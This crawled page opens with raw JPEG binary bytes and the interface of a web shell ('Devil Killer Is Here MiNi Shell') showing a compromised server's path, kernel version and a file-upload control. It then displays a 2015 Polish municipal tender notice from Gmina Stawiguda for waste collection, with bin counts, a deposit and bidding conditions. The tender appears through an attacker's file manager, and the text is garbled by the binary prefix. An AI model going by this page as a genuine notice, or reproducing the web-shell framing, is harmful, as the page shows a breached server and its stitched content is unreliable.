JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150526/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150526/76389-N-2015.html

<p class="kh_header"><b>Stawiguda: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych oraz nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe na terenu Gminy Stawiguda</b><br>
<b>Numer ogłoszenia: 76389 - 2015; data zamieszczenia: 26.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stawiguda , ul. Olsztyńska 10, 11-034 Stawiguda, woj. warmińsko-mazurskie, tel. 089 5126475, faks 089 5126910.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stawiguda.com.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych oraz nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe na terenu Gminy Stawiguda.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych oraz nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe na terenie Gminy Stawiguda, w sposób zgodny z przepisami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (tj. Dz. U. 2013 r. poz. 1399 ze zm.), przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. 2013 poz. 21 ze zm.), Planem Gospodarki Odpadami dla Województwa Warmińsko-Mazurskiego na lata 2011-2016 oraz przepisami Regulaminu utrzymania czystości i porządku na terenie Gminy Stawiguda, a także innymi przepisami prawa ustawowego i miejscowego. 1.2. Odbiór i zagospodarowanie odpadów należy prowadzić w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowanie do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z obowiązującymi przepisami prawa.1.3.	Celem Zamawiającego jest realizacja racjonalnej gospodarki odpadami ze szczególnym naciskiem na osiągnięcie efektywnych wyników w segregacji. Wykonawcę obowiązuje bezwzględny zakaz mieszania selektywnie zbieranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi.1.4. Zakres prac obejmuje: 1) Odbiór odpadów komunalnych z nieruchomości zamieszkałych i niezamieszkałych oraz nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe, w tym: a) Odbiór odpadów komunalnych niesegregowanych (zmieszanych), b)	Odbiór odpadów segregowanych (tworzywa sztuczne, papier i tektura, szkło). 2) Odbiór odpadów wielkogabarytowych i zużytego sprzętu elektrycznego i elektronicznego. 3) Odbiór odpadów niebezpiecznych w postaci leków. 4) Odbiór innych odpadów z Punktu Selektywnej Zbiórki Odpadów Komunalnych tj.: opakowania wielomateriałowe, chemikalia, metale, zużyte akumulatory, baterie, zużyte opony, odpady problematyczne (tj.: okna, drzwi, wanny, sedesy, spłuczki, umywalki, kabiny prysznicowe, brodziki, wykładziny, gumoleum, dywany). 5) Odbiór odpadów biodegradowalnych (zielonych). 6)Odbiór odpadów z koszy ulicznych. 1.5. Szczegółowy sposób odbioru odpadów komunalnych z nieruchomości zamieszkałych i niezamieszkałych oraz nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe.1.Odbiór odpadów komunalnych z nieruchomości zamieszkałych i niezamieszkałych oraz nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe.1.1. Odbiór odpadów komunalnych niesegregowanych (zmieszanych). a) Odbiór odpadów komunalnych niesegregowanych (zmieszanych). Niesegregowane (zmieszane) odpady komunalne odbierane będą z pojemników o pojemności 120l w zabudowie jednorodzinnej oraz z pojemników o pojemności 1100l w zabudowie wielorodzinnej. Z nieruchomości niezamieszkałych, na których prowadzona jest działalność gospodarcza odpady komunalne odbierane będą z pojemników (120l, 1100l lub kontenerów o pojemności 7m3). Częstotliwość odbioru (wywozu) niesegregowanych (zmieszanych) odpadów komunalnych, co 2 tygodnie w zabudowie jednorodzinnej oraz z nieruchomości niezamieszkałych oraz 1 raz w tygodniu w zabudowie wielorodzinnej. Niesegregowane (zmieszane) odpady komunalne odbierane będą z nieruchomości wykorzystywanych na cele rekreacyjno - wypoczynkowe z pojemników o pojemności 120l. Częstotliwości odbioru odpadów z nieruchomości wykorzystywanych na cele rekreacyjno - wypoczynkowe odbywać się będzie co 2 tygodnie. Dodatkowo dla nieruchomości wykorzystywanych na cele rekreacyjno - wypoczynkowe dopuszcza się ustawienie pojemników o pojemności 1100l lub kontenerów o pojemności 7m3 w miejscach ogólnodostępnych po uzgodnieniu z Zamawiającym. Wykonawca ma obowiązek dostarczenia odpowiednich pojemników w ramach przedmiotu zamówienia, natomiast właściciele nieruchomości utrzymują pojemniki w odpowiednim stanie sanitarnym, porządkowym i technicznym. Dokładne daty odbiorów odpadów niesegregowanych (zmieszanych) należy zawrzeć w harmonogramie, wykonanym przez Wykonawcę i zaakceptowanym przez  Zamawiającego zgodnie z wytycznymi zawartymi w Rozdziale III pkt 6 Obowiązki Zamawiającego i Wykonawcy przed rozpoczęciem i w trakcie realizacji zamówienia. Wykonawca ma obowiązek gospodarowania niesegregowanymi (zmieszanymi) odpadami komunalnymi zbieranymi z terenu Gminy Stawiguda zgodnie z przepisami obowiązującego prawa. Obowiązkiem Wykonawcy jest odbiór wszystkich odpadów znajdujących się w pojemnikach oraz wokół nich. 1.2. Odbiór odpadów segregowanych (tworzywa sztuczne, papier i tektura, szkło). a) Odbiór odpadów segregowanych (tworzywa sztuczne, papier i tektura, szkło). Odbiór selektywnie zebranych odpadów komunalnych na terenie Gminy Stawiguda będzie się odbywał w systemie workowym (worki o pojemności 120l) na terenach zabudowy jednorodzinnej i nieruchomościach niezamieszkałych oraz pojemnikowym (pojemniki o pojemności 1100l w odpowiednich kolorach) na terenach zabudowy wielorodzinnej. Z nieruchomości wykorzystywanych na cele rekreacyjno - wypoczynkowe odbiór selektywnie zebranych odpadów komunalnych może odbywać się  w systemie workowym (worki o pojemności 120l) lub pojemnikowym (pojemniki o pojemności 1100l w odpowiednich kolorach). Wprowadza się trzy kolory worków i pojemników: żółty - na odpady z tworzyw sztucznych, metale i opakowaniowe odpady wielomateriałowe, niebieski - na odpady z papieru i tektury, zielony - na odpady ze szkła. Worki  poza odpowiednią pojemnością powinny posiadać następujące parametry: materiał - folia polietylenowa LDPE, półprzezroczysta, o grubości zapewniającej wytrzymałość worków dla odpowiedniej frakcji odpadów i wielkości worków, oznakowanie - dopuszcza się nadruki informujące o przeznaczeniu worka do danej frakcji odpadów, sposobie segregacji odpadów oraz inf. o firmie odbierającej. Wykonawca ma obowiązek dostarczenia odpowiednich worków i pojemników w ramach przedmiotu zamówienia. Worki do odbioru selektywnie zebranych odpadów komunalnych Wykonawca zobowiązany jest dostarczyć do mieszkańców w ilościach zapewniających funkcjonowanie systemu (minimum 1 worek na każdą z odbieranych selektywnie frakcji odpadów, czyli minimum 3 worki na każde gospodarstwo domowe w zabudowie jednorodzinnej i nieruchomościach wykorzystywanych na cele rekreacyjno - wypoczynkowe) przed 1 lipca 2015r. W trakcie obowiązywania umowy Wykonawca zobowiązany jest dostarczać worki do mieszkańców w ilościach odpowiadających ilością i kolorystyką workom odebranym. Częstotliwość odbioru selektywnie zebranych odpadów komunalnych - przynajmniej 1 raz w miesiącu w zabudowie jednorodzinnej, nieruchomościach niezamieszkałych i nieruchomościach wykorzystywanych na cele rekreacyjno - wypoczynkowe oraz 1 raz w tygodniu w zabudowie wielorodzinnej. W sezonie letnim w miesiącach lipiec i sierpień odbiór selektywnie zebranych odpadów komunalnych będzie odbywał się raz na 2 tygodnie. Dokładne daty odbiorów selektywnie zebranych odpadów komunalnych należy zawrzeć w harmonogramie, wykonanym przez Wykonawcę i zaakceptowanym przez Zamawiającego zgodnie z wytycznymi zawartymi w Rozdziale III pkt 6 Obowiązki Zamawiającego i Wykonawcy przed rozpoczęciem i w trakcie realizacji zamówienia. Wykonawca ma obowiązek gospodarowania segregowanymi odpadami komunalnymi zbieranymi z terenu Gminy Stawiguda zgodnie z przepisami obowiązującego prawa. Obowiązkiem Wykonawcy jest odbiór wszystkich wystawionych worków oraz odpadów znajdujących się w pojemnikach. 2) Odbiór odpadów wielkogabarytowych i zużytego sprzętu elektrycznego i elektronicznego. Odbiór odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego, odbywać się będzie z Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK) oraz podczas corocznej akcji zbiórki odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego bezpośrednio sprzed posesji właścicieli nieruchomości lub przygotowanych punktów (w zabudowie wielorodzinnej) w ustalonych przez Zamawiającego z Wykonawcą terminach. Częstotliwość załadunku i wywozu przynajmniej raz w roku dla zabudowy mieszkaniowej jednorodzinnej i z nieruchomości wykorzystywanych na cele rekreacyjno - wypoczynkowe oraz raz na kwartał dla zabudowy wielorodzinnej. Obowiązkiem Wykonawcy jest odbiór wszystkich wystawionych przed posesje i w przygotowanych punktach odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego.Wykonawca ma obowiązek gospodarowania odpadami wielkogabarytowymi oraz zużytym sprzętem elektrycznym i elektronicznym zbieranym z terenu Gminy Stawiguda zgodnie z przepisami obowiązującego prawa. 3) Odbiór odpadów niebezpiecznych w postaci przeterminowanych leków. Odbiór odpadów niebezpiecznych w postaci przeterminowanych leków odbywać się będzie z punktu aptecznego zlokalizowanego w miejscowości Stawiguda ul. Olsztyńska 8 (Apteka Pod kasztanem) po telefonicznym zgłoszeniu Zamawiającego. Częstotliwość odbioru około 6 razy w trakcie trwania umowy (pojemnik o pojemności do 120l). Pojemnik zapewni Zamawiający. Wykonawca ma obowiązek gospodarowania niebezpiecznymi odpadami w postaci przeterminowanych leków zbieranymi z terenu Gminy Stawiguda zgodnie z przepisami obowiązującego prawa. 4) Odbiór innych odpadów (opakowania wielomateriałowe, chemikalia, metale, zużyte akumulatory, baterie, opony, odpady problematyczne (tj.: okna, drzwi, wanny, sedesy, spłuczki, umywalki, kabiny prysznicowe, brodziki, wykładziny, gumoleum, dywany)). Odbiór odpadów innych (opakowania wielomateriałowe, metale, zużyte akumulatory, baterie, opony, chemikalia m.in. farby, lakiery, opakowania po chemikaliach i przeterminowanych środkach ochrony roślin, odpady problematyczne (tj.: okna, drzwi, wanny, sedesy, spłuczki, umywalki, kabiny prysznicowe, brodziki, wykładziny, gumoleum, dywany) odbywać się będzie z Punktu Selektywnej Zbiórki Odpadów Komunalnych  (PSZOK) po zapełnieniu ustawionych pojemników   (o pojemności 1100l lub kontenerów o pojemności 7m3) w ramach przedmiotu zamówienia przez Wykonawcę dla poszczególnych rodzajów odpadów. Przewidziana częstotliwość odbioru około 30 sztuk rocznie. Częstotliwość odbioru może ulec zmianie, ze względu na trudną do przewidzenia ilość oraz częstotliwość zapełniania pojemników przez mieszkańców. Wykonawca ma obowiązek gospodarowania w/w odpadami zbieranymi z terenu Gminy Stawiguda zgodnie z przepisami obowiązującego prawa. Obowiązkiem Wykonawcy jest odbiór wszystkich odpadów znajdujących się w pojemnikach oraz wokół nich. 5) Odbiór odpadów biodegradowalnych i zielonych. Odbiór odpadów biodegradowalnych (zielonych) odbywać się będzie z Punktu Selektywnej Zbiórki Odpadów Komunalnych  (PSZOK) po zapełnieniu ustawionych przez Wykonawcę w ramach przedmiotu zamówienia kontenerów o pojemności 7m3. Odbiór odpadów odbywać się będzie od kwietnia do listopada. Przewidziana częstotliwość odbioru około 10 pojemników o pojemności 7m3 rocznie. Częstotliwość odbioru może ulec zmianie, ze względu na trudną do przewidzenia ilość oraz częstotliwość zapełniania pojemników przez mieszkańców. Wykonawca ma obowiązek gospodarowania odpadami biodegradowalnymi i zielonymi zbieranymi z terenu Gminy Stawiguda zgodnie z przepisami obowiązującego prawa. Obowiązkiem Wykonawcy jest odbiór wszystkich odpadów znajdujących się w pojemnikach oraz wokół nich. 6) Odbiór odpadów z koszy ulicznych. Odbiór odpadów z koszy ulicznych (pojemniki o poj. od 35l do 75l) odbywać się będzie z częstotliwością 
2 razy w miesiącu. Ilość koszy w poszczególnych miejscowościach przedstawia się następująco: Stawiguda 15szt., Gryźliny 7szt., Miodówko 3szt., Pluski 5szt., Majdy 3 szt., Dorotowo 3szt., Tomaszkowo 15 szt., Bartąg 5szt., Bartążek 3 szt., Ruś 3 szt. Kosze uliczne zapewnia Zamawiający. Ilość koszy ulicznych może ulec zmianie. Wykonawca ma obowiązek gospodarowania w/w odpadami komunalnymi zbieranymi z terenu Gminy Stawiguda zgodnie z przepisami obowiązującego prawa. Obowiązkiem Wykonawcy jest odbiór wszystkich odpadów znajdujących się w pojemnikach oraz wokół nich. 1.6. Sprawozdawczość. Obowiązkiem Wykonawcy będzie dostarczanie Zamawiającemu półrocznych sprawozdań, o jakich mowa w art. 9n ustawy o utrzymaniu czystości i porządku w gminach (tj. Dz. U. 2013 poz. 1399 z późn. zm.) oraz przedstawienie Zamawiającemu dowodów potwierdzających wykonanie czynności zagospodarowania odebranych odpadów tj. kart przekazania odpadów, a w odniesieniu do makulatury, szkła, tworzyw sztucznych i metali także dowodów potwierdzających recykling. Sprawozdania powinny być sporządzone zgodnie z Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 roku w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami, a w przypadku zmiany rozporządzenia, zgodnie z obowiązującymi wzorami druków. Powyższe sprawozdanie należy przekazać Zamawiającemu w terminie do końca miesiąca następującego po upływie półrocza, którego dotyczy. W celu umożliwienia sporządzenia przez Zamawiającego rocznego sprawozdania z realizacji zadań z zakresu gospodarowania odpadami komunalnymi, o których mowa w art. 9q ustawy, Wykonawca zobowiązany będzie przekazać Zamawiającemu niezbędne informacje umożliwiające sporządzenie sprawozdania. Wykonawca zobowiązany będzie również do przedkładania Zamawiającemu innych informacji dot. odbioru, zagospodarowania i segregacji odpadów, jeśli w trakcie realizacji zamówienia na Zamawiającego nałożony zostanie obowiązek sporządzania innych sprawozdań z zakresu gospodarki odpadami, a wynikać one będą ze zmiany powszechnie obowiązującego w tym zakresie prawa unijnego, krajowego, miejscowego. Dotyczy to tylko informacji w posiadaniu których będzie Wykonawca, a nie Zamawiający. Zamawiający poinformuje pisemnie Wykonawcę o zaistnieniu nowego obowiązku i nie będzie to przesłanka do zmiany obowiązującej strony umowy. Obowiązkiem Wykonawcy będzie przekazywanie Zamawiającemu comiesięcznych sprawozdań dotyczących adresów nieruchomości na których jest prowadzona niewłaściwa segregacja odpadów (mieszanie ich z komunalnymi odpadami niesegregowanymi), nie wystawienie w terminie worków do selektywnej zbiórki odpadów bądź inne nieprawidłowości związane z należytym funkcjonowaniem całego systemu. Wykonawca będzie dostarczał sprawozdania o których mowa powyżej do 10-go dnia każdego miesiąca. 2. Dane charakteryzujące zamówienie. 2.1. Podstawowe dane statystyczne charakteryzujące przedmiot zamówienia: A. Powierzchnia Gminy Stawiguda wynosi: 222,52 km2, B. Liczba ludności ogółem - 7832 (stan na 31.12.2014r.) 2.2. Wykaz ilości punktów odbioru odpadów z pojemników o pojemności 120l z nieruchomości zamieszkałych, nieruchomości nie zamieszkałych i nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe: sołectwo Bartąg liczba nieruchomości zamieszkałych 275, liczba nieruchomości niezamieszkałych 23, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 1, sołectwo Bartążek liczba nieruchomości zamieszkałych 105, liczba nieruchomości niezamieszkałych 4, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 1, sołectwo Dorotowo liczba nieruchomości zamieszkałych 167, liczba nieruchomości niezamieszkałych 12, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 12, sołectwo Gągłąwki liczba nieruchomości zamieszkałych 73, liczba nieruchomości niezamieszkałych 5, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 0, sołectwo Gryźliny-Zielonowo liczba nieruchomości zamieszkałych 167, liczba nieruchomości niezamieszkałych 11, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 63, sołectwo Jaroty liczba nieruchomości zamieszkałych 36, liczba nieruchomości niezamieszkałych 2, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 0, sołectwo Majdy-Kręsk liczba nieruchomości zamieszkałych 67, liczba nieruchomości niezamieszkałych 8, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 181, sołectwo Miodówko-Zezuj liczba nieruchomości zamieszkałych 45, liczba nieruchomości niezamieszkałych 11, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 11, sołectwo Pluski liczba nieruchomości zamieszkałych 161, liczba nieruchomości niezamieszkałych 25, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 162, sołectwo Ruś liczba nieruchomości zamieszkałych 143, liczba nieruchomości niezamieszkałych 4, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 2, sołectwo Stawiguda liczba nieruchomości zamieszkałych 591, liczba nieruchomości niezamieszkałych 93, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 7, sołectwo Tomaszkowo liczba nieruchomości zamieszkałych 234, liczba nieruchomości niezamieszkałych 17, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 15, sołectwo Wymój liczba nieruchomości zamieszkałych 63, liczba nieruchomości niezamieszkałych 1, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 30.  Razem liczba nieruchomości zamieszkałych 2127, liczba nieruchomości niezamieszkałych 216, liczba nieruchomości wykorzystywanych na cele rekreacyjno-wypoczynkowe 485. 2.3. Przewidywana ilość pojemników odbieranych miesięcznie: 1) około 5085 pojemników o pojemności 120l, 2) około 405 pojemników o pojemności 1100l, w tym: a) w zabudowie wielorodzinnej Jaroty - Stawigudzka około 150 pojemników 1100l  b) w zabudowie wielorodzinnej Bartąg - Tęczowy Las około  90 pojemników 1100l, 3) około 18 kontenerów o pojemności 7m3. 2.4. Przewidywana ilość worków  do selektywnej zbiórki odpadów odbieranych miesięcznie: około 4600 szt. z około 2256 nieruchomości. 2.5. Przewidywana ilość odbieranych pojemników 1100l do selektywnej zbiórki odpadów odbieranych miesięcznie około 95 szt. a pojemników typu dzwon około 17 szt. 2.6. Przewidywana ilość odbieranych odpadów wielkogabarytowych: około 200m3 oraz zużytego sprzętu elektrycznego i elektronicznego: około 25 m3. 2.7. W okresie objętym zamówieniem, rzeczywista ilość odebranych odpadów (w tym pojemników), worków do selektywnej zbiórki odpadów, ilości nieruchomości mogą się różnić od podanych w SIWZ. 2.8. Ilości odpadów odebranych z terenu Gminy Stawiguda, określona na podstawie sprawozdań składanych przez przedsiębiorców posiadających zezwolenie na odbieranie odpadów komunalnych w latach 2013 - 2014 wynosiła: zmieszane odpady komunalne: rok 2013 - 1355,4 Mg, rok 2014 - 1221,95 Mg, Opakowania z papieru i tektury: rok 2013 - 19,6 Mg, rok 2014 - 25,096 Mg, Opakowania ze szkła: rok 2013 - 23,8 Mg, rok 2014 - 109,43 Mg, Opakowania z tworzyw sztucznych: rok 2013 -19,2 Mg, rok 2014 - 54,77 Mg, Odpady wielkogabarytowe: rok 2013 - 36,4 Mg, rok 2014 - 54,66 Mg, Odpady ulegające biodegradacji: rok 2013 - 0,4 Mg, rok 2014 - 1,66 Mg. 3. Punkt selektywnego zbierania odpadów komunalnych (PSZOK). Zamawiający zorganizował centralny punkt selektywnego zbierania odpadów komunalnych w Gminie Stawiguda z godzinami pracy 700-1700 od poniedziałku do soboty. W punkcie selektywnego zbierania odpadów komunalnych odbierane są: opakowania wielomateriałowe, chemikalia, metale, zużyte akumulatory i baterie, zużyte opony, odpady problematyczne (tj.: okna, drzwi, wanny, sedesy, spłuczki, umywalki, kabiny prysznicowe, brodziki, wykładziny, gumoleum, dywany), odpady komunalne biodegradowalne i zielone, odpady wielkogabarytowe oraz sprzęt elektryczny i elektroniczny. Wykonawca ma obowiązek dostarczenia odpowiedniej ilości pojemników i kontenerów w ramach przedmiotu zamówienia (około 7 pojemników). Odbiór odpadów z PSZOK będzie odbywał się na telefoniczne zgłoszenie Zamawiającego po zapełnieniu pojemników (przewidywana częstotliwość podana jest w opisie przedmiotu zamówienia). Wykonawca będzie odbierał zapełnione pojemniki najpóźniej w trzeci dzień po telefonicznym zgłoszeniu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.40.00-3, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości: 17 357 zł (słownie: siedemnaście tysięcy trzysta pięćdziesiąt siedem złotych). Wykonawca wnosi wadium w jednej lub kilku następujących formach: 1)	w pieniądzu, sposób przekazania przelew pieniężny na konto Zamawiającego z dopiskiem BiZ/OŚiP.271.1.10.2015 - Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Stawiguda 98 8823 0007 2001 0100 1973 0008  2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.) sposób przekazania: w siedzibie zamawiającego - pokój nr 14 Przy czym za termin wniesienia wadium w formie pieniądza uważa się za skutecznie wniesione, jeżeli przed upływem terminu składania ofert znajdzie się ono na koncie Zamawiającego. Termin wniesienia wadium w wybranej formie - przed terminem składania ofert tj. do dnia 03.06.2015 r. godz. 11.45. Wadium musi obejmować cały okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
